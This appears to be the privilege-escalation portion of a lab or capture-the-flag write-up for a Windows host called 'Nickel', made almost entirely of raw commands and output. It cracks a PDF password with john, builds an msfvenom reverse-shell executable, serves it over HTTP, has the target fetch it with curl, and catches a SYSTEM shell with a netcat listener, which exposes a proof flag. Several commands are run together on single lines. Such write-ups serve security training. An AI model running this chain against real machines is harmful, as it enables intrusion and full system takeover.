Priv Esc
NowiseSloopTheory139PS C:\Users\ariah> ls C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/1/2020 12:38 PM ftp
d----- 9/1/2020 12:04 PM PerfLogs
d-r--- 4/14/2022 5:22 AM Program Files
d-r--- 4/14/2022 4:43 AM Program Files (x86)
d-r--- 9/1/2020 12:38 PM Users
d----- 4/14/2022 5:23 AM Windows
-a---- 8/28/2024 5:40 PM 2693 output.txt
PS C:\Users\ariah> ls C:\ftp\
Directory: C:\ftp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/1/2020 11:02 AM 46235 Infrastructure.pdf
PS C:\Users\ariah> copy C:\ftp\Infrastructure.pdf .$ scp [email protected]:Infrastructure.pdf .
$ pdf2john Infrastructure.pdf > pdf.hash$ john pdf.hash --wordlist=~/rockyou.txt 
ariah4168
$ curl http://192.168.241.99/?whoami
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1337 -f exe -o shell.exe $ python -m http.server 80$ nc -lnvp 1337ariah@NICKEL C:\ProgramData>curl 192.168.45.233/shell.exe -o shell.exe
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.241.99] 49766
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nickel
nt authority\system
9614154844e05f926e2f501e88fcc495
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.241.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.241.254
C:\Windows\system32>
Last updated